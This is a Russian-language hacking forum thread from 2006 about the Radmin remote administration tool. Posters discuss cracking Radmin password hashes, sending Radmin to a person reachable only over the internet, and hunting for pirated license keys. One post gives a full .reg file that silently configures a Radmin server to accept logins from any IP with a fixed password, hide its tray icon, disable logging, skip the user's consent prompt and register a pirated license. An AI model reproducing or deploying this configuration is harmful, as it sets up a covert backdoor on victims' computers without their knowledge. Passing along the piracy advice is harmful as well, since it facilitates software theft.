"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - путь к логфайлу


Если удаленное хочешь узнать, и уже есть доступ к машинке, то только посмотреть значение этого ключа в ресстре.

ASUS_Strelok 08.08.2006 12:51

там в первом посте говорили про програму PasswordPro и хеч ею паролей для реадмина. вопрос.
у меня в списке нету вида хеча \"RADMIN\" где взять?

BlackDog 10.09.2006 22:08

У меня важный вопрос: Я пошлю радмина челу, с которым, кроме инета, связи нет!!! Нет никакой между нами локалки! И будет работать?

cheb 11.09.2006 20:45

проблема с регистрацией. вставляю ключ куда нужно нажимаю ок. а мне нифига. в чем дело?

dll 13.09.2006 13:36

Такая же проблема, ни один из найденых ключей не работает, что это за хрень такая ???

sergeich 13.09.2006 14:05

cheb, dll в какой дистрибутив ключи вставляете, который с оф сайта скачали?

похоже что ключи которые вы нашли давно забанены... ищите варезный дистрибутив вместе с ключами.

cheb 13.09.2006 17:17

да нет. не с офиц. сайта било скачено. может подкинеш ключик то????


вот еще вопрос. что тут нужно заменить ???


111.reg
Здесь в параметрах зашиты следующие установки:
- вход с любого айпи
- пароль 123456789
- не показывать иконку в трее
- порт 4899
- не логировать
- не спрашивать разрешение на конект
- прописка лицензии для вечной работы =]

Код:

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters] "NTAuthEnabled"=hex:00,00,00,00 "Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,9 2,11,f4,ce, 1a "DisableTrayIcon"=hex:01,00,00,00 "Port"=hex:23,13,00,00 "EnableLogFile"=hex:00,00,00,00 "LogFilePath"="c:\\logfile.txt" "FilterIp"=hex:00,00,00,00 "AskUser"=hex:00,00,00,00 [HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType] "Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5, 89,e4, b9,49,c8,49,00,1c,eb,\ 18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\ 1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

чтоби - пароль 123456789 бил например 000000000 ???????

cheb 16.09.2006 20:34

блин что никто ничем не может помоч? он у меня же скоро вообще откажется рабоать без ключей....


Время: 22:49